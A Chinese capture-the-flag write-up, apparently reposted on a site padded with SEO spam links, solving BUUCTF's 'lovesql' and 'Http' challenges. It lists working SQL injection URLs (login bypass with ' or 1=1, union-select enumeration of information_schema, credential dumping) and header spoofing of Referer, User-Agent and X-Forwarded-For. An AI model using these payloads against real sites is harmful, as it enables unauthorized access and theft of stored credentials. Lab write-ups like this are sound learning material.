当前位置: 首页 > wzjs >正文

2016网站备案西安做推广优化的公司

2016网站备案,西安做推广优化的公司,网站怎么做json数据,网站建设公司愿景9.lovesql(SQL注入考点) 解题过程:①是否存在SQL注入 ②万能密码 admin or 11 ③爆字段数 ④看回显 ⑤爆数据库 ⑥爆数据库的表 ⑦爆出表的列 ⑧读取内容,爆flag 基础知识点:union 联合查询,information表,group_con…

9.lovesql(SQL注入考点)

解题过程:①是否存在SQL注入 ②万能密码 admin' or 1=1 ③爆字段数 ④看回显 ⑤爆数据库 ⑥爆数据库的表 ⑦爆出表的列 ⑧读取内容,爆flag

基础知识点:union 联合查询,information表,group_concat()字符串连接

①是否存在SQL注入:加单引号报错 (语法错误)

/check.php?username=1'&password=2

/check.php?username=1&password=2'

/check.php?username=1'&password=2'

②使用万能密码 admin' or 1=1# 或者1' or 1=1# 密码随便写

(在输入框输入的#,可以直接使用hackbar地址栏,只需要将#进行URL编码,即替换为%23)

③爆字段(判断字段数,或者用union select null(,null,null)来判断)

check.php?username=admin ' order by 1 %23&password=1

check.php?username=admin ' order by 2 %23&password=1

check.php?username=admin ' order by 3 %23&password=1

check.php?username=admin ' order by 4 %23&password=1

发现4个参数报错,说明有3个字段

④看回显

/check.php?username=1' union select 1,2,3%23&password=1

页面显示hello 2! Your password is '3'说明回显点位在2,3

⑤爆数据库

/check.php?username=1' union select 1,database(),version()%23&password=1

⑥爆数据库的表

/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

爆出来数据库的表名有geekuser, l0ve1ysq1

⑦爆出表的列(查看两个表)

/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='geekuser'%23&password=1

/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'%23&password=1

页面显示id,username,password

⑧读取内容,爆flag

/check.php?username=1' union select 1,2,group_concat(id,username,password) from geekuser%23&password=1

/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1

或者

/check.php?username=1' union select 1,2,group_concat(username,0x40,password) from l0ve1ysq1 %23&password=1

/check.php?username=1' union select 1,2,group_concat(username,0x40,0x40,password) from l0ve1ysq1 %23&password=1

10.Http(http代理)

基础知识:

  • X-Forwarded-For(XFF)又名XFF头

1)概述:X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。 Squid 缓存代理服务器的开发人员最早引入了这一HTTP头字段,并由IETF在HTTP头字段标准化草案中正式提出。 2)作用:获得HTTP请求端的真是IP 3)格式: X-Forwarded-For: client1, proxy1, proxy2, proxy3 其中client1是原始客户端的IP,后面接着是代理服务器的IP

  • Referer请求头字段

1)概述:Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。

2)作用:告诉服务器该请求是通过哪个页面发送过来的,从而使服务器进行对应的处理。

3)格式:Referer:url(此处为页面链接)

  • User-Agent请求头字段

1)概述:User-Agent是HTTP请求中用来检查浏览页面的访问者在用什么操作系统(包括版本号)浏览器(包括版本号)和用户个人偏好的字段。

2)作用:告知服务器访问页面的客户是什么操作系统(包括版本号)浏览器(包括版本号)和用户个人偏好

3)格式:User-Agent:Mozilla/5.0 (平台) 引擎版本 浏览器版本号 (此为通常格式)

解题过程:

查看网页源代码,发现Secret.php,点开后发现是"it doesn't come from 'https://Sycsecret.buuoj.cn'",提示该网页的Referer头为"https://Sycsecret.buuoj.cn",在请求头中添加Referer:https://Sycsecret.buuoj.cn字段发送请求后得到响应为

使用"Syclover" browser,于是将User-Agent改为"Syclover" brower即可

根据提示,是来自本地的访问请求,所以更改XFF头为127.0.0.1

爆出flag

http://www.dtcms.com/wzjs/2385.html

相关文章:

  • 南宁做网站公司必荐云尚网络google商店
  • 手机数据线东莞网站建设技术支持郑州官网网站推广优化
  • 网站地图表现形式百度的电话人工客服电话
  • 一个网站做多少关键词鄞州seo整站优化服务
  • 我在学校志愿队做网站的经历seo关键词排名优化案例
  • 济南 营销型网站建设厦门seo招聘
  • 门户网站建设的平台自助建站网站哪个好
  • 北京网站建设方案书营销渠道方案
  • 品牌策划与设计优化设计
  • 重庆网站建设方案深圳网站优化推广
  • java图书管理网站建设平台推广策略都有哪些
  • 怎么学做淘宝电商网站吗接推广app任务的平台
  • 网站建设运营协议申京效率值联盟第一
  • 微信注册网站入口培训网站排名
  • 网站开发java连接数据库后求职seo
  • 网站建设7个主要流程seo排名首页
  • 学院后勤处网站建设方案书谷歌网站推广优化
  • 展示型网站设计方案郑州seo优化哪家好
  • 代做课程设计网站怎样策划一个营销型网站
  • 正则表达式 网站地址seo国外英文论坛
  • 网站备案关闭影响排名网站关键词优化方法
  • 网站网络优化服务下载百度安装
  • 佛山推广seo排名太原网站优化公司
  • 门户网站的案例分析外链查询工具
  • 网站运营单位是什么意思国外网站制作
  • 浦东做网站公司seo是什么学校
  • 可做ppt的长篇英文阅读网站百度竞价推广点击器
  • 静态网页制作网站整站优化cms
  • 谷歌网站优化北京网站营销seo方案
  • 建设电影网站的目的郑州网站托管